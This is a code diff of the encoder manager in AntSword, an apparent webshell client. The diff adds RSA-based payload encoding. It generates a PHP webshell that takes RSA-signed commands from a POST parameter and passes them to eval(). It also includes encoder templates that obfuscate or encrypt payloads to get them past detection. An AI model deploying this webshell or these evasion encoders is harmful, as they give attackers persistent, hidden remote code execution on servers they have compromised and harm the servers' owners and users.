toastr.success(LANG['message']["retype_success"], LANG_T["success"]);
break
}
that.syncencoders();
}
});
grid.init();
that.grid = grid;
that.parseData();
}
// 创建新的编码器
createEncoder(t) {
createEncoder(id) {
let self = this;
let idArr = id.split('_');
let type = idArr[1];
let rsa = idArr.length >= 3 ? '_rsa' : '';
layer.prompt({
value: `myencoder`,
title: `<i class="fa fa-file-code-o"></i> ${LANG["prompt"]["create_encoder"]}`
},(value, i, e) => {
}, (value, i, e) => {
value = value.toLocaleLowerCase();
if(!value.match(/^[a-zA-Z0-9_]+$/)){
toastr.error(LANG["message"]["ename_invalid"],LANG_T['error']);
if (!value.match(/^[a-zA-Z0-9_]+$/)) {
toastr.error(LANG["message"]["ename_invalid"], LANG_T['error']);
return
}
if(self._checkname(value, t)){
toastr.error(LANG["message"]["ename_duplicate"] ,LANG_T['error']);
if (self._checkname(value, type)) {
toastr.error(LANG["message"]["ename_duplicate"], LANG_T['error']);
layer.close(i);
return
}
let savePath= path.join(remote.process.env.AS_WORKDIR,`antData/encoders/${t}/encoder/${value}.js`);
let savePath = path.join(remote.process.env.AS_WORKDIR, `antData/encoders/${type}/encoder/${value}${rsa}.js`);
fs.writeFileSync(savePath, self.default_template);
fs.writeFileSync(savePath, rsa ? self.default_rsa_template : self.default_template);
var ids = self.grid.getAllRowIds();
let _id = 1;
if(ids.length > 0){
_id = parseInt(ids[ids.length-1]);
if (ids.length > 0) {
_id = parseInt(ids[ids.length - 1]);
}
_id ++;
self.grid.addRow(_id, `${_id},${antSword.noxss(value)},${t}`);
_id++;
self.grid.addRow(_id, `${_id},${antSword.noxss(value)},${type}`);
toastr.success(LANG["message"]["create_success"], LANG_T["success"]);
self.cell.progressOff();
layer.close(i);
......@@ -168,7 +190,7 @@ class Encoders {
let self = this;
// 获取选中ID列表
let ids = self.grid.getSelectedId();
if(!ids){
if (!ids) {
toastr.warning(LANG["message"]["edit_not_select"], LANG_T["warning"]);
return
}
......@@ -178,10 +200,9 @@ class Encoders {
return
}
let _id = _ids[0];
const ename = self.grid.getRowAttribute(_id, 'ename');
const epath = self.grid.getRowAttribute(_id, 'epath');
let buff = fs.readFileSync(epath+".js");
let buff = fs.readFileSync(epath + ".js");
let opt = {
title: `${LANG["edit_win_title"]}: ${ename}`,
width: 800,
......@@ -201,11 +222,11 @@ class Encoders {
if (id === 'save') {
// 保存代码
let saveData = editor.session.getValue();
if(!saveData){
toastr.warning(LANG["message"]["edit_null_value"],LANG_T["warning"]);
if (!saveData) {
toastr.warning(LANG["message"]["edit_null_value"], LANG_T["warning"]);
return
}
fs.writeFileSync(epath+".js", saveData);
fs.writeFileSync(epath + ".js", saveData);
toastr.success(LANG["message"]["edit_save_success"], LANG_T["success"]);
}
});
......@@ -245,50 +266,161 @@ class Encoders {
});
}
// 生成 RSA
generateRsaKey(bit = 1024) {
const key = new NodeRSA({ b: bit });
let pubKey = key.exportKey('pkcs8-public-pem');
let priKey = key.exportKey('pkcs1-private-pem');
let keyPath = this.rsa.keyPath;
fs.writeFileSync(keyPath.pub, pubKey);
fs.writeFileSync(keyPath.pri, priKey);
for (var _path in keyPath) {
if (!fs.existsSync(keyPath[_path])) {
toastr.error(LANG["message"]["rsa_save_error"], LANG_T["error"]);
return false;
}
}
toastr.success(LANG["message"]["rsa_save_success"], LANG_T["success"]);
this.reloadRsa();
return true;
}
// 重新读取 RSA
reloadRsa() {
let keyPath = this.rsa.keyPath;
let pubKey = fs.existsSync(keyPath.pub) ? fs.readFileSync(keyPath.pub) : '';
let priKey = fs.existsSync(keyPath.pri) ? fs.readFileSync(keyPath.pri) : '';
this.rsa.form.setItemValue('public_key', pubKey);
this.rsa.form.setItemValue('private_key', priKey);
this.rsa.form.setItemValue('php_code', `<?php
$cmd = @$_POST['ant'];
$pk = <<<EOF
${pubKey}
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
$cmd .= $de;
}
}
eval($cmd);`);
}
// 编辑选中的编码器代码
rsaConfig() {
let self = this;
let opt = {
title: LANG["rsa_config_win_title"],
width: 800,
height: 600,
};
let _win = new WIN(opt);
_win.win.centerOnScreen();
let toolbar = _win.win.attachToolbar();
let form = _win.win.attachForm();
self.rsa.form = form;
toolbar.loadStruct([
{ id: 'generate', type: 'button', icon: 'repeat', text: LANG["toolbar"]['generate'] },
]);
toolbar.attachEvent('onClick', (id) => {
if (id === 'generate') {
if (fs.existsSync(self.rsa.keyPath.pub) && fs.existsSync(self.rsa.keyPath.pri)) {
layer.confirm(`${LANG['confirm']['generate']} `,
{
icon: 2,
shift: 6,
title: `${LANG['confirm']["generate"]} `,
}, (_) => {
layer.close(_);
self.generateRsaKey();
});
} else {
self.generateRsaKey();
}
}
});
form.loadStruct([
{
type: "settings",
labelWidth: 750,
inputWidth: 750,
position: "label-top",
labelLeft: 25,
inputLeft: 25
},
{
type: 'block',
inputWidth: 'auto',
offsetTop: 20,
list: [{
type: 'input',
label: LANG['form']['public_key'],
name: 'public_key',
rows: 6,
value: ''
}, {
type: 'input',
label: LANG['form']['private_key'],
name: 'private_key',
rows: 15,
value: ''
}, {
type: 'input',
label: LANG['form']['php_code'],
name: 'php_code',
rows: 20,
value: ''
}]
}], true);
self.reloadRsa();
}
deleteEncoder() {
let self = this;
// 获取选中ID列表
let ids = self.grid.getSelectedId();
if(!ids){
if (!ids) {
toastr.warning(LANG["message"]["delete_not_select"], LANG_T["warning"]);
return
}
let _ids = ids.split(",");
layer.confirm(`${LANG['confirm']['delete'](_ids.length==1?self.grid.getRowAttribute(_ids[0],"ename"): _ids.length)}`,
{
icon: 2,
shift: 6,
title: `<i class="fa fa-trash"></i> ${LANG["delete_title"]}`,
},(_)=>{
layer.close(_);
_ids.map((_id)=>{
var ename = self.grid.getRowAttribute(_id, 'ename');
var epath = self.grid.getRowAttribute(_id, 'epath');
fs.unlink(epath+".js");
layer.confirm(`${LANG['confirm']['delete'](_ids.length == 1 ? self.grid.getRowAttribute(_ids[0], "ename") : _ids.length)} `,
{
icon: 2,
shift: 6,
title: `${LANG["delete_title"]} `,
}, (_) => {
layer.close(_);
_ids.map((_id) => {
var epath = self.grid.getRowAttribute(_id, 'epath');
fs.unlinkSync(epath + ".js");
});
toastr.success(LANG["message"]["delete_success"], LANG_T["success"]);
self.syncencoders();
});
toastr.success(LANG["message"]["delete_success"], LANG_T["success"]);
self.syncencoders();
});
}
get default_template() {
return `/**
* php::base64编码器
* Create at: ${new Date().format("yyyy/MM/dd hh:mm:ss")}
*/
\'use strict\';
\'use strict\';
/*
* @param {String} pwd 连接密码
* @param {Array} data 编码器处理前的 payload 数组
* @return {Array} data 编码器处理后的 payload 数组
*/
module.exports = (pwd, data) => {
// ########## 请在下方编写你自己的代码 ###################
// 以下代码为 PHP Base64 样例
// 生成一个随机变量名
let randomID = \`_0x\${Math.random().toString(16).substr(2)}\`;
/*
* @param {String} pwd 连接密码
* @param {Array} data 编码器处理前的 payload 数组
* @return {Array} data 编码器处理后的 payload 数组
*/
module.exports = (pwd, data) => {
// ########## 请在下方编写你自己的代码 ###################
// 以下代码为 PHP Base64 样例
// 生成一个随机变量名
let randomID = \`_0x\${Math.random().toString(16).substr(2)}\`;
// 原有的 payload 在 data['_']中
// 取出来之后,转为 base64 编码并放入 randomID key 下
data[randomID] = Buffer.from(data['_']).toString('base64');
......@@ -304,10 +436,36 @@ module.exports = (pwd, data) => {
return data;
}`;
}
get default_rsa_template() {
return `/**
* php::RSA编码器
* Create at: ${new Date().format("yyyy/MM/dd hh:mm:ss")}
*/
'use strict';
/*
* @param {String} pwd 连接密码
* @param {Array} data 编码器处理前的 payload 数组
* @return {Array} data 编码器处理后的 payload 数组
*/
module.exports = (pwd, data, ext) => {
let n = Math.ceil(data['_'].length / 80);
let l = Math.ceil(data['_'].length / n);
let r = []
for (var i = 0; n > i; i++) {
r.push(ext['rsa'].encryptPrivate(data['_'].substr(i * l, l), 'base64'));
}
data[pwd] = r.join("|");
delete data['_'];
return data;
}`;
}
// 检查 name 是否重复
_checkname(name,t) {
let tstr = ',' + antSword['encoders'][t].join(',')+',';
return tstr.indexOf(","+name+",")!=-1;
_checkname(name, t) {
let tstr = ',' + antSword['encoders'][t].join(',') + ',';
return tstr.indexOf("," + name + ",") != -1;
}
// 解析数据
parseData() {
......@@ -316,7 +474,7 @@ module.exports = (pwd, data) => {
let _id = 1;
Object.keys(self.encoders).map((t) => {
self.encoders[t].map( _ => {
self.encoders[t].map(_ => {
data.push({
id: _id,
ename: _,
......@@ -335,37 +493,37 @@ module.exports = (pwd, data) => {
self.grid.clearAll();
self.grid.parse({
'rows': data
}, 'json');
}, 'json');
}
// 同步到全局编码器
syncencoders() {
antSword['encoders'] = (function(){
var encoders = {asp:[],aspx:[],php:[],custom:[]};
var encoders_path = {asp:[],aspx:[],php:[],custom:[]};
let userencoder_path = path.join(remote.process.env.AS_WORKDIR,'antData/encoders');
antSword['encoders'] = (function () {
var encoders = { asp: [], aspx: [], php: [], custom: [] };
var encoders_path = { asp: [], aspx: [], php: [], custom: [] };
let userencoder_path = path.join(remote.process.env.AS_WORKDIR, 'antData/encoders');
// 初始化
!fs.existsSync(userencoder_path) ? fs.mkdirSync(userencoder_path) : null;
['asp','aspx','php','custom'].map((t)=>{
!fs.existsSync(path.join(userencoder_path, `${t}`))? fs.mkdirSync(path.join(userencoder_path, `${t}`)):null;
['asp', 'aspx', 'php', 'custom'].map((t) => {
!fs.existsSync(path.join(userencoder_path, `${t}`)) ? fs.mkdirSync(path.join(userencoder_path, `${t}`)) : null;
let t_path = path.join(userencoder_path, `${t}/encoder/`);
!fs.existsSync(t_path) ? fs.mkdirSync(t_path) : null;
let es = fs.readdirSync(t_path);
if(es){
es.map((_)=>{
if(!_.endsWith(".js")){
if (es) {
es.map((_) => {
if (!_.endsWith(".js")) {
return
}
encoders[t].push(_.slice(0,-3));
encoders_path[t].push(path.join(t_path, _.slice(0,-3)));
encoders[t].push(_.slice(0, -3));
encoders_path[t].push(path.join(t_path, _.slice(0, -3)));
});
}
antSword["core"][t].prototype.user_encoders = encoders_path[t];
});
return encoders;
})();
this.encoders=antSword["encoders"];
this.encoders = antSword["encoders"];
this.parseData();
}
}
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment